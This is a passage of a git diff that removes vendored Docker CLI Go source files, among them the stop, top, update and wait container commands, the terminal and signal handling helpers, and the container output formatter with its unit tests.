+++ /dev/null
@@ -1,67 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-	"time"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type stopOptions struct {
-	time        int
-	timeChanged bool
-
-	containers []string
-}
-
-// NewStopCommand creates a new cobra.Command for `docker stop`
-func NewStopCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts stopOptions
-
-	cmd := &cobra.Command{
-		Use:   "stop [OPTIONS] CONTAINER [CONTAINER...]",
-		Short: "Stop one or more running containers",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.containers = args
-			opts.timeChanged = cmd.Flags().Changed("time")
-			return runStop(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.IntVarP(&opts.time, "time", "t", 10, "Seconds to wait for stop before killing it")
-	return cmd
-}
-
-func runStop(dockerCli *command.DockerCli, opts *stopOptions) error {
-	ctx := context.Background()
-
-	var timeout *time.Duration
-	if opts.timeChanged {
-		timeoutValue := time.Duration(opts.time) * time.Second
-		timeout = &timeoutValue
-	}
-
-	var errs []string
-
-	errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, id string) error {
-		return dockerCli.Client().ContainerStop(ctx, id, timeout)
-	})
-	for _, container := range opts.containers {
-		if err := <-errChan; err != nil {
-			errs = append(errs, err.Error())
-		} else {
-			fmt.Fprintf(dockerCli.Out(), "%s\n", container)
-		}
-	}
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/top.go b/vendor/github.com/docker/docker/cli/command/container/top.go
deleted file mode 100644
index 160153ba7f..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/top.go
+++ /dev/null
@@ -1,58 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-	"text/tabwriter"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type topOptions struct {
-	container string
-
-	args []string
-}
-
-// NewTopCommand creates a new cobra.Command for `docker top`
-func NewTopCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts topOptions
-
-	cmd := &cobra.Command{
-		Use:   "top CONTAINER [ps OPTIONS]",
-		Short: "Display the running processes of a container",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.container = args[0]
-			opts.args = args[1:]
-			return runTop(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.SetInterspersed(false)
-
-	return cmd
-}
-
-func runTop(dockerCli *command.DockerCli, opts *topOptions) error {
-	ctx := context.Background()
-
-	procList, err := dockerCli.Client().ContainerTop(ctx, opts.container, opts.args)
-	if err != nil {
-		return err
-	}
-
-	w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0)
-	fmt.Fprintln(w, strings.Join(procList.Titles, "\t"))
-
-	for _, proc := range procList.Processes {
-		fmt.Fprintln(w, strings.Join(proc, "\t"))
-	}
-	w.Flush()
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/tty.go b/vendor/github.com/docker/docker/cli/command/container/tty.go
deleted file mode 100644
index 6af8e2becf..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/tty.go
+++ /dev/null
@@ -1,103 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"os"
-	gosignal "os/signal"
-	"runtime"
-	"time"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/client"
-	"github.com/docker/docker/pkg/signal"
-	"golang.org/x/net/context"
-)
-
-// resizeTtyTo resizes tty to specific height and width
-func resizeTtyTo(ctx context.Context, client client.ContainerAPIClient, id string, height, width uint, isExec bool) {
-	if height == 0 && width == 0 {
-		return
-	}
-
-	options := types.ResizeOptions{
-		Height: height,
-		Width:  width,
-	}
-
-	var err error
-	if isExec {
-		err = client.ContainerExecResize(ctx, id, options)
-	} else {
-		err = client.ContainerResize(ctx, id, options)
-	}
-
-	if err != nil {
-		logrus.Debugf("Error resize: %s", err)
-	}
-}
-
-// MonitorTtySize updates the container tty size when the terminal tty changes size
-func MonitorTtySize(ctx context.Context, cli *command.DockerCli, id string, isExec bool) error {
-	resizeTty := func() {
-		height, width := cli.Out().GetTtySize()
-		resizeTtyTo(ctx, cli.Client(), id, height, width, isExec)
-	}
-
-	resizeTty()
-
-	if runtime.GOOS == "windows" {
-		go func() {
-			prevH, prevW := cli.Out().GetTtySize()
-			for {
-				time.Sleep(time.Millisecond * 250)
-				h, w := cli.Out().GetTtySize()
-
-				if prevW != w || prevH != h {
-					resizeTty()
-				}
-				prevH = h
-				prevW = w
-			}
-		}()
-	} else {
-		sigchan := make(chan os.Signal, 1)
-		gosignal.Notify(sigchan, signal.SIGWINCH)
-		go func() {
-			for range sigchan {
-				resizeTty()
-			}
-		}()
-	}
-	return nil
-}
-
-// ForwardAllSignals forwards signals to the container
-func ForwardAllSignals(ctx context.Context, cli *command.DockerCli, cid string) chan os.Signal {
-	sigc := make(chan os.Signal, 128)
-	signal.CatchAll(sigc)
-	go func() {
-		for s := range sigc {
-			if s == signal.SIGCHLD || s == signal.SIGPIPE {
-				continue
-			}
-			var sig string
-			for sigStr, sigN := range signal.SignalMap {
-				if sigN == s {
-					sig = sigStr
-					break
-				}
-			}
-			if sig == "" {
-				fmt.Fprintf(cli.Err(), "Unsupported signal: %v. Discarding.\n", s)
-				continue
-			}
-
-			if err := cli.Client().ContainerKill(ctx, cid, sig); err != nil {
-				logrus.Debugf("Error sending signal: %s", err)
-			}
-		}
-	}()
-	return sigc
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/unpause.go b/vendor/github.com/docker/docker/cli/command/container/unpause.go
deleted file mode 100644
index c4d8d4841e..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/unpause.go
+++ /dev/null
@@ -1,50 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type unpauseOptions struct {
-	containers []string
-}
-
-// NewUnpauseCommand creates a new cobra.Command for `docker unpause`
-func NewUnpauseCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts unpauseOptions
-
-	cmd := &cobra.Command{
-		Use:   "unpause CONTAINER [CONTAINER...]",
-		Short: "Unpause all processes within one or more containers",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.containers = args
-			return runUnpause(dockerCli, &opts)
-		},
-	}
-	return cmd
-}
-
-func runUnpause(dockerCli *command.DockerCli, opts *unpauseOptions) error {
-	ctx := context.Background()
-
-	var errs []string
-	errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerUnpause)
-	for _, container := range opts.containers {
-		if err := <-errChan; err != nil {
-			errs = append(errs, err.Error())
-		} else {
-			fmt.Fprintf(dockerCli.Out(), "%s\n", container)
-		}
-	}
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/update.go b/vendor/github.com/docker/docker/cli/command/container/update.go
deleted file mode 100644
index 75765856c5..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/update.go
+++ /dev/null
@@ -1,163 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	containertypes "github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/docker/go-units"
-	"github.com/spf13/cobra"
-)
-
-type updateOptions struct {
-	blkioWeight        uint16
-	cpuPeriod          int64
-	cpuQuota           int64
-	cpuRealtimePeriod  int64
-	cpuRealtimeRuntime int64
-	cpusetCpus         string
-	cpusetMems         string
-	cpuShares          int64
-	memoryString       string
-	memoryReservation  string
-	memorySwap         string
-	kernelMemory       string
-	restartPolicy      string
-
-	nFlag int
-
-	containers []string
-}
-
-// NewUpdateCommand creates a new cobra.Command for `docker update`
-func NewUpdateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts updateOptions
-
-	cmd := &cobra.Command{
-		Use:   "update [OPTIONS] CONTAINER [CONTAINER...]",
-		Short: "Update configuration of one or more containers",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.containers = args
-			opts.nFlag = cmd.Flags().NFlag()
-			return runUpdate(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.Uint16Var(&opts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)")
-	flags.Int64Var(&opts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period")
-	flags.Int64Var(&opts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota")
-	flags.Int64Var(&opts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds")
-	flags.Int64Var(&opts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds")
-	flags.StringVar(&opts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)")
-	flags.StringVar(&opts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)")
-	flags.Int64VarP(&opts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)")
-	flags.StringVarP(&opts.memoryString, "memory", "m", "", "Memory limit")
-	flags.StringVar(&opts.memoryReservation, "memory-reservation", "", "Memory soft limit")
-	flags.StringVar(&opts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap")
-	flags.StringVar(&opts.kernelMemory, "kernel-memory", "", "Kernel memory limit")
-	flags.StringVar(&opts.restartPolicy, "restart", "", "Restart policy to apply when a container exits")
-
-	return cmd
-}
-
-func runUpdate(dockerCli *command.DockerCli, opts *updateOptions) error {
-	var err error
-
-	if opts.nFlag == 0 {
-		return fmt.Errorf("You must provide one or more flags when using this command.")
-	}
-
-	var memory int64
-	if opts.memoryString != "" {
-		memory, err = units.RAMInBytes(opts.memoryString)
-		if err != nil {
-			return err
-		}
-	}
-
-	var memoryReservation int64
-	if opts.memoryReservation != "" {
-		memoryReservation, err = units.RAMInBytes(opts.memoryReservation)
-		if err != nil {
-			return err
-		}
-	}
-
-	var memorySwap int64
-	if opts.memorySwap != "" {
-		if opts.memorySwap == "-1" {
-			memorySwap = -1
-		} else {
-			memorySwap, err = units.RAMInBytes(opts.memorySwap)
-			if err != nil {
-				return err
-			}
-		}
-	}
-
-	var kernelMemory int64
-	if opts.kernelMemory != "" {
-		kernelMemory, err = units.RAMInBytes(opts.kernelMemory)
-		if err != nil {
-			return err
-		}
-	}
-
-	var restartPolicy containertypes.RestartPolicy
-	if opts.restartPolicy != "" {
-		restartPolicy, err = runconfigopts.ParseRestartPolicy(opts.restartPolicy)
-		if err != nil {
-			return err
-		}
-	}
-
-	resources := containertypes.Resources{
-		BlkioWeight:        opts.blkioWeight,
-		CpusetCpus:         opts.cpusetCpus,
-		CpusetMems:         opts.cpusetMems,
-		CPUShares:          opts.cpuShares,
-		Memory:             memory,
-		MemoryReservation:  memoryReservation,
-		MemorySwap:         memorySwap,
-		KernelMemory:       kernelMemory,
-		CPUPeriod:          opts.cpuPeriod,
-		CPUQuota:           opts.cpuQuota,
-		CPURealtimePeriod:  opts.cpuRealtimePeriod,
-		CPURealtimeRuntime: opts.cpuRealtimeRuntime,
-	}
-
-	updateConfig := containertypes.UpdateConfig{
-		Resources:     resources,
-		RestartPolicy: restartPolicy,
-	}
-
-	ctx := context.Background()
-
-	var (
-		warns []string
-		errs  []string
-	)
-	for _, container := range opts.containers {
-		r, err := dockerCli.Client().ContainerUpdate(ctx, container, updateConfig)
-		if err != nil {
-			errs = append(errs, err.Error())
-		} else {
-			fmt.Fprintf(dockerCli.Out(), "%s\n", container)
-		}
-		warns = append(warns, r.Warnings...)
-	}
-	if len(warns) > 0 {
-		fmt.Fprintf(dockerCli.Out(), "%s", strings.Join(warns, "\n"))
-	}
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/utils.go b/vendor/github.com/docker/docker/cli/command/container/utils.go
deleted file mode 100644
index 6bef92463c..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/utils.go
+++ /dev/null
@@ -1,143 +0,0 @@
-package container
-
-import (
-	"strconv"
-
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/events"
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/api/types/versions"
-	"github.com/docker/docker/cli/command"
-	clientapi "github.com/docker/docker/client"
-)
-
-func waitExitOrRemoved(ctx context.Context, dockerCli *command.DockerCli, containerID string, waitRemove bool) chan int {
-	if len(containerID) == 0 {
-		// containerID can never be empty
-		panic("Internal Error: waitExitOrRemoved needs a containerID as parameter")
-	}
-
-	var removeErr error
-	statusChan := make(chan int)
-	exitCode := 125
-
-	// Get events via Events API
-	f := filters.NewArgs()
-	f.Add("type", "container")
-	f.Add("container", containerID)
-	options := types.EventsOptions{
-		Filters: f,
-	}
-	eventCtx, cancel := context.WithCancel(ctx)
-	eventq, errq := dockerCli.Client().Events(eventCtx, options)
-
-	eventProcessor := func(e events.Message) bool {
-		stopProcessing := false
-		switch e.Status {
-		case "die":
-			if v, ok := e.Actor.Attributes["exitCode"]; ok {
-				code, cerr := strconv.Atoi(v)
-				if cerr != nil {
-					logrus.Errorf("failed to convert exitcode '%q' to int: %v", v, cerr)
-				} else {
-					exitCode = code
-				}
-			}
-			if !waitRemove {
-				stopProcessing = true
-			} else {
-				// If we are talking to an older daemon, `AutoRemove` is not supported.
-				// We need to fall back to the old behavior, which is client-side removal
-				if versions.LessThan(dockerCli.Client().ClientVersion(), "1.25") {
-					go func() {
-						removeErr = dockerCli.Client().ContainerRemove(ctx, containerID, types.ContainerRemoveOptions{RemoveVolumes: true})
-						if removeErr != nil {
-							logrus.Errorf("error removing container: %v", removeErr)
-							cancel() // cancel the event Q
-						}
-					}()
-				}
-			}
-		case "detach":
-			exitCode = 0
-			stopProcessing = true
-		case "destroy":
-			stopProcessing = true
-		}
-		return stopProcessing
-	}
-
-	go func() {
-		defer func() {
-			statusChan <- exitCode // must always send an exit code or the caller will block
-			cancel()
-		}()
-
-		for {
-			select {
-			case <-eventCtx.Done():
-				if removeErr != nil {
-					return
-				}
-			case evt := <-eventq:
-				if eventProcessor(evt) {
-					return
-				}
-			case err := <-errq:
-				logrus.Errorf("error getting events from daemon: %v", err)
-				return
-			}
-		}
-	}()
-
-	return statusChan
-}
-
-// getExitCode performs an inspect on the container. It returns
-// the running state and the exit code.
-func getExitCode(ctx context.Context, dockerCli *command.DockerCli, containerID string) (bool, int, error) {
-	c, err := dockerCli.Client().ContainerInspect(ctx, containerID)
-	if err != nil {
-		// If we can't connect, then the daemon probably died.
-		if !clientapi.IsErrConnectionFailed(err) {
-			return false, -1, err
-		}
-		return false, -1, nil
-	}
-	return c.State.Running, c.State.ExitCode, nil
-}
-
-func parallelOperation(ctx context.Context, containers []string, op func(ctx context.Context, container string) error) chan error {
-	if len(containers) == 0 {
-		return nil
-	}
-	const defaultParallel int = 50
-	sem := make(chan struct{}, defaultParallel)
-	errChan := make(chan error)
-
-	// make sure result is printed in correct order
-	output := map[string]chan error{}
-	for _, c := range containers {
-		output[c] = make(chan error, 1)
-	}
-	go func() {
-		for _, c := range containers {
-			err := <-output[c]
-			errChan <- err
-		}
-	}()
-
-	go func() {
-		for _, c := range containers {
-			sem <- struct{}{} // Wait for active queue sem to drain.
-			go func(container string) {
-				output[container] <- op(ctx, container)
-				<-sem
-			}(c)
-		}
-	}()
-	return errChan
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/wait.go b/vendor/github.com/docker/docker/cli/command/container/wait.go
deleted file mode 100644
index 19ccf7ac25..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/wait.go
+++ /dev/null
@@ -1,50 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type waitOptions struct {
-	containers []string
-}
-
-// NewWaitCommand creates a new cobra.Command for `docker wait`
-func NewWaitCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts waitOptions
-
-	cmd := &cobra.Command{
-		Use:   "wait CONTAINER [CONTAINER...]",
-		Short: "Block until one or more containers stop, then print their exit codes",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.containers = args
-			return runWait(dockerCli, &opts)
-		},
-	}
-	return cmd
-}
-
-func runWait(dockerCli *command.DockerCli, opts *waitOptions) error {
-	ctx := context.Background()
-
-	var errs []string
-	for _, container := range opts.containers {
-		status, err := dockerCli.Client().ContainerWait(ctx, container)
-		if err != nil {
-			errs = append(errs, err.Error())
-		} else {
-			fmt.Fprintf(dockerCli.Out(), "%d\n", status)
-		}
-	}
-	if len(errs) > 0 {
-		return fmt.Errorf("%s", strings.Join(errs, "\n"))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/events_utils.go b/vendor/github.com/docker/docker/cli/command/events_utils.go
deleted file mode 100644
index e710c97576..0000000000
--- a/vendor/github.com/docker/docker/cli/command/events_utils.go
+++ /dev/null
@@ -1,49 +0,0 @@
-package command
-
-import (
-	"sync"
-
-	"github.com/Sirupsen/logrus"
-	eventtypes "github.com/docker/docker/api/types/events"
-)
-
-type eventProcessor func(eventtypes.Message, error) error
-
-// EventHandler is abstract interface for user to customize
-// own handle functions of each type of events
-type EventHandler interface {
-	Handle(action string, h func(eventtypes.Message))
-	Watch(c <-chan eventtypes.Message)
-}
-
-// InitEventHandler initializes and returns an EventHandler
-func InitEventHandler() EventHandler {
-	return &eventHandler{handlers: make(map[string]func(eventtypes.Message))}
-}
-
-type eventHandler struct {
-	handlers map[string]func(eventtypes.Message)
-	mu       sync.Mutex
-}
-
-func (w *eventHandler) Handle(action string, h func(eventtypes.Message)) {
-	w.mu.Lock()
-	w.handlers[action] = h
-	w.mu.Unlock()
-}
-
-// Watch ranges over the passed in event chan and processes the events based on the
-// handlers created for a given action.
-// To stop watching, close the event chan.
-func (w *eventHandler) Watch(c <-chan eventtypes.Message) {
-	for e := range c {
-		w.mu.Lock()
-		h, exists := w.handlers[e.Action]
-		w.mu.Unlock()
-		if !exists {
-			continue
-		}
-		logrus.Debugf("event handler: received event: %v", e)
-		go h(e)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container.go b/vendor/github.com/docker/docker/cli/command/formatter/container.go
deleted file mode 100644
index 6273453355..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/container.go
+++ /dev/null
@@ -1,235 +0,0 @@
-package formatter
-
-import (
-	"fmt"
-	"strconv"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/api"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/stringutils"
-	units "github.com/docker/go-units"
-)
-
-const (
-	defaultContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Ports}}\t{{.Names}}"
-
-	containerIDHeader = "CONTAINER ID"
-	namesHeader       = "NAMES"
-	commandHeader     = "COMMAND"
-	runningForHeader  = "CREATED"
-	statusHeader      = "STATUS"
-	portsHeader       = "PORTS"
-	mountsHeader      = "MOUNTS"
-	localVolumes      = "LOCAL VOLUMES"
-	networksHeader    = "NETWORKS"
-)
-
-// NewContainerFormat returns a Format for rendering using a Context
-func NewContainerFormat(source string, quiet bool, size bool) Format {
-	switch source {
-	case TableFormatKey:
-		if quiet {
-			return defaultQuietFormat
-		}
-		format := defaultContainerTableFormat
-		if size {
-			format += `\t{{.Size}}`
-		}
-		return Format(format)
-	case RawFormatKey:
-		if quiet {
-			return `container_id: {{.ID}}`
-		}
-		format := `container_id: {{.ID}}
-image: {{.Image}}
-command: {{.Command}}
-created_at: {{.CreatedAt}}
-status: {{- pad .Status 1 0}}
-names: {{.Names}}
-labels: {{- pad .Labels 1 0}}
-ports: {{- pad .Ports 1 0}}
-`
-		if size {
-			format += `size: {{.Size}}\n`
-		}
-		return Format(format)
-	}
-	return Format(source)
-}
-
-// ContainerWrite renders the context for a list of containers
-func ContainerWrite(ctx Context, containers []types.Container) error {
-	render := func(format func(subContext subContext) error) error {
-		for _, container := range containers {
-			err := format(&containerContext{trunc: ctx.Trunc, c: container})
-			if err != nil {
-				return err
-			}
-		}
-		return nil
-	}
-	return ctx.Write(&containerContext{}, render)
-}
-
-type containerContext struct {
-	HeaderContext
-	trunc bool
-	c     types.Container
-}
-
-func (c *containerContext) MarshalJSON() ([]byte, error) {
-	return marshalJSON(c)
-}
-
-func (c *containerContext) ID() string {
-	c.AddHeader(containerIDHeader)
-	if c.trunc {
-		return stringid.TruncateID(c.c.ID)
-	}
-	return c.c.ID
-}
-
-func (c *containerContext) Names() string {
-	c.AddHeader(namesHeader)
-	names := stripNamePrefix(c.c.Names)
-	if c.trunc {
-		for _, name := range names {
-			if len(strings.Split(name, "/")) == 1 {
-				names = []string{name}
-				break
-			}
-		}
-	}
-	return strings.Join(names, ",")
-}
-
-func (c *containerContext) Image() string {
-	c.AddHeader(imageHeader)
-	if c.c.Image == "" {
-		return "<no image>"
-	}
-	if c.trunc {
-		if trunc := stringid.TruncateID(c.c.ImageID); trunc == stringid.TruncateID(c.c.Image) {
-			return trunc
-		}
-	}
-	return c.c.Image
-}
-
-func (c *containerContext) Command() string {
-	c.AddHeader(commandHeader)
-	command := c.c.Command
-	if c.trunc {
-		command = stringutils.Ellipsis(command, 20)
-	}
-	return strconv.Quote(command)
-}
-
-func (c *containerContext) CreatedAt() string {
-	c.AddHeader(createdAtHeader)
-	return time.Unix(int64(c.c.Created), 0).String()
-}
-
-func (c *containerContext) RunningFor() string {
-	c.AddHeader(runningForHeader)
-	createdAt := time.Unix(int64(c.c.Created), 0)
-	return units.HumanDuration(time.Now().UTC().Sub(createdAt))
-}
-
-func (c *containerContext) Ports() string {
-	c.AddHeader(portsHeader)
-	return api.DisplayablePorts(c.c.Ports)
-}
-
-func (c *containerContext) Status() string {
-	c.AddHeader(statusHeader)
-	return c.c.Status
-}
-
-func (c *containerContext) Size() string {
-	c.AddHeader(sizeHeader)
-	srw := units.HumanSizeWithPrecision(float64(c.c.SizeRw), 3)
-	sv := units.HumanSizeWithPrecision(float64(c.c.SizeRootFs), 3)
-
-	sf := srw
-	if c.c.SizeRootFs > 0 {
-		sf = fmt.Sprintf("%s (virtual %s)", srw, sv)
-	}
-	return sf
-}
-
-func (c *containerContext) Labels() string {
-	c.AddHeader(labelsHeader)
-	if c.c.Labels == nil {
-		return ""
-	}
-
-	var joinLabels []string
-	for k, v := range c.c.Labels {
-		joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v))
-	}
-	return strings.Join(joinLabels, ",")
-}
-
-func (c *containerContext) Label(name string) string {
-	n := strings.Split(name, ".")
-	r := strings.NewReplacer("-", " ", "_", " ")
-	h := r.Replace(n[len(n)-1])
-
-	c.AddHeader(h)
-
-	if c.c.Labels == nil {
-		return ""
-	}
-	return c.c.Labels[name]
-}
-
-func (c *containerContext) Mounts() string {
-	c.AddHeader(mountsHeader)
-
-	var name string
-	var mounts []string
-	for _, m := range c.c.Mounts {
-		if m.Name == "" {
-			name = m.Source
-		} else {
-			name = m.Name
-		}
-		if c.trunc {
-			name = stringutils.Ellipsis(name, 15)
-		}
-		mounts = append(mounts, name)
-	}
-	return strings.Join(mounts, ",")
-}
-
-func (c *containerContext) LocalVolumes() string {
-	c.AddHeader(localVolumes)
-
-	count := 0
-	for _, m := range c.c.Mounts {
-		if m.Driver == "local" {
-			count++
-		}
-	}
-
-	return fmt.Sprintf("%d", count)
-}
-
-func (c *containerContext) Networks() string {
-	c.AddHeader(networksHeader)
-
-	if c.c.NetworkSettings == nil {
-		return ""
-	}
-
-	networks := []string{}
-	for k := range c.c.NetworkSettings.Networks {
-		networks = append(networks, k)
-	}
-
-	return strings.Join(networks, ",")
-}
diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container_test.go b/vendor/github.com/docker/docker/cli/command/formatter/container_test.go
deleted file mode 100644
index 16137897b9..0000000000
--- a/vendor/github.com/docker/docker/cli/command/formatter/container_test.go
+++ /dev/null
@@ -1,398 +0,0 @@
-package formatter
-
-import (
-	"bytes"
-	"encoding/json"
-	"fmt"
-	"strings"
-	"testing"
-	"time"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestContainerPsContext(t *testing.T) {
-	containerID := stringid.GenerateRandomID()
-	unix := time.Now().Add(-65 * time.Second).Unix()
-
-	var ctx containerContext
-	cases := []struct {
-		container types.Container
-		trunc     bool
-		expValue  string
-		expHeader string
-		call      func() string
-	}{
-		{types.Container{ID: containerID}, true, stringid.TruncateID(containerID), containerIDHeader, ctx.ID},
-		{types.Container{ID: containerID}, false, containerID, containerIDHeader, ctx.ID},
-		{types.Container{Names: []string{"/foobar_baz"}}, true, "foobar_baz", namesHeader, ctx.Names},
-		{types.Container{Image: "ubuntu"}, true, "ubuntu", imageHeader, ctx.Image},
-		{types.Container{Image: "verylongimagename"}, true, "verylongimagename", imageHeader, ctx.Image},
-		{types.Container{Image: "verylongimagename"}, false, "verylongimagename", imageHeader, ctx.Image},
-		{types.Container{
-			Image:   "a5a665ff33eced1e0803148700880edab4",
-			ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5",
-		},
-			true,
-			"a5a665ff33ec",
-			imageHeader,
-			ctx.Image,
-		},
-		{types.Container{
-			Image:   "a5a665ff33eced1e0803148700880edab4",
-			ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5",
-		},
-			false,
-			"a5a665ff33eced1e0803148700880edab4",
-			imageHeader,
-			ctx.Image,
-		},
-		{types.Container{Image: ""}, true, "<no image>", imageHeader, ctx.Image},
-		{types.Container{Command: "sh -c 'ls -la'"}, true, `"sh -c 'ls -la'"`, commandHeader, ctx.Command},
-		{types.Container{Created: unix}, true, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt},
-		{types.Container{Ports: []types.Port{{PrivatePort: 8080, PublicPort: 8080, Type: "tcp"}}}, true, "8080/tcp", portsHeader, ctx.Ports},
-		{types.Container{Status: "RUNNING"}, true, "RUNNING", statusHeader, ctx.Status},
-		{types.Container{SizeRw: 10}, true, "10 B", sizeHeader, ctx.Size},
-		{types.Container{SizeRw: 10, SizeRootFs: 20}, true, "10 B (virtual 20 B)", sizeHeader, ctx.Size},
-		{types.Container{}, true, "", labelsHeader, ctx.Labels},
-		{types.Container{Labels: map[string]string{"cpu": "6", "storage": "ssd"}}, true, "cpu=6,storage=ssd", labelsHeader, ctx.Labels},
-		{types.Container{Created: unix}, true, "About a minute", runningForHeader, ctx.RunningFor},
-		{types.Container{
-			Mounts: []types.MountPoint{
-				{
-					Name:   "this-is-a-long-volume-name-and-will-be-truncated-if-trunc-is-set",
-					Driver: "local",
-					Source: "/a/path",
-				},
-			},
-		}, true, "this-is-a-lo...", mountsHeader, ctx.Mounts},
-		{types.Container{
-			Mounts: []types.MountPoint{
-				{
-					Driver: "local",
-					Source: "/a/path",
-				},
-			},
-		}, false, "/a/path", mountsHeader, ctx.Mounts},
-		{types.Container{
-			Mounts: []types.MountPoint{
-				{
-					Name:   "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203",
-					Driver: "local",
-					Source: "/a/path",
-				},
-			},
-		}, false, "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203", mountsHeader, ctx.Mounts},
-	}
-
-	for _, c := range cases {
-		ctx = containerContext{c: c.container, trunc: c.trunc}
-		v := c.call()
-		if strings.Contains(v, ",") {
-			compareMultipleValues(t, v, c.expValue)
-		} else if v != c.expValue {
-			t.Fatalf("Expected %s, was %s\n", c.expValue, v)
-		}
-
-		h := ctx.FullHeader()
-		if h != c.expHeader {
-			t.Fatalf("Expected %s, was %s\n", c.expHeader, h)
-		}
-	}
-
-	c1 := types.Container{Labels: map[string]string{"com.docker.swarm.swarm-id": "33", "com.docker.swarm.node_name": "ubuntu"}}
-	ctx = containerContext{c: c1, trunc: true}
-
-	sid := ctx.Label("com.docker.swarm.swarm-id")
-	node := ctx.Label("com.docker.swarm.node_name")
-	if sid != "33" {
-		t.Fatalf("Expected 33, was %s\n", sid)
-	}
-
-	if node != "ubuntu" {
-		t.Fatalf("Expected ubuntu, was %s\n", node)
-	}
-
-	h := ctx.FullHeader()
-	if h != "SWARM ID\tNODE NAME" {
-		t.Fatalf("Expected %s, was %s\n", "SWARM ID\tNODE NAME", h)
-
-	}
-
-	c2 := types.Container{}
-	ctx = containerContext{c: c2, trunc: true}
-
-	label := ctx.Label("anything.really")
-	if label != "" {
